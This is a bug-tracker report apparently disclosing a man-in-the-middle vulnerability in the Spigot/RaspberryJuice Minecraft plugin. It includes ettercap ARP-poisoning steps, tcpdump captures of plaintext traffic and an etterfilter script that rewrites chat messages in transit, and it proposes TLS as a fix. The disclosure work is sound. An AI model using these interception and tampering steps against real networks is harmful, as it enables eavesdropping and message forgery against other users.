Uploaded image for project: 'SpigotPlugins'
  1. SpigotPlugins
  2. PLUG-464

Un(encrypted/authenticated) client/server lead to MiTM Vulnerability in Spigot/RaspberryJuice

    XMLWordPrintable

Details

    • 3279-Spigot-3892929-2071671 (MC: 1.17.1) (Implementing API version 1.17.1-R0.1-SNAPSHOT)
    • RaspberryJuice 1.12.1
    • Yes

    Description

      When a client wants to connect to RaspberryJuice, all traffic seems available on the network in plain text. Furthermore, the data sent by the client can be manipulated and resend back to the server while still appearing to be coming from the client:

      This bug seems affecting the current and all previous versions of RaspberryJuice and spigot

      Reproduce the issue with a server running spigot/RaspberryJuice listening on 4711 and client on the same network with python3 and mcpi lib, here is a test script:

       

      from mcpi.minecraft import Minecraft
      mc = Minecraft.create(address="192.168.56.1")
      mc.postToChat('Hello Minecraft')

      On attacker box, use ettercap to run ARP poisoning, now the data is visible uncrypted, with tcpdump:

       

      tcpdump -A -i eth1 port 4711 and host 192.168.56.110
      04:05:09.845686 IP 192.168.56.110.39210 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057102917 ecr 39383616], length 27
      E..O.@@.@..B..8n..8g.*.g@.C._@.............
      ?..E.X.@chat.post(Hello Minecraft)
      

       

      To manipulate the data, load to ettercap the following filter compiled with "etterfilter fil.ecf -o fil.ef": 
       

      if (ip.proto == TCP && tcp.dst == 4711 && search(DATA.data, "Hello Minecraft") ) {
       log(DATA.data,"/tmp/mispelled_ettercap.log"); 
       replace("Hello Minecraft","Message Hacked!"); 
       msg("Altered Client Message\n"); 
      }

       
       

      Resend the message by the client, and the message now will be altered:

       

      04:10:37.084001 IP 192.168.56.110.39212 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057429973 ecr 39710674], length 27
      E..O=u@.@.....8n..8g.,.g9b"................
      ?....]..chat.post(Message Hacked!)
      

       

       
      Suggestions to prevent this:
      I haven't tested on the other plugins to confirm but the options to protect this with encrypted/authenticated channel is possible from spigot and/or the plugin level, by using TLS for authentication, and a cipher like RSA, DH, ECDH for keys exchanges.

      Attachments

        Activity

          People

            Unassigned Unassigned
            tariqhawis Tariq Hawis
            Votes:
            0 Vote for this issue
            Watchers:
            2 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: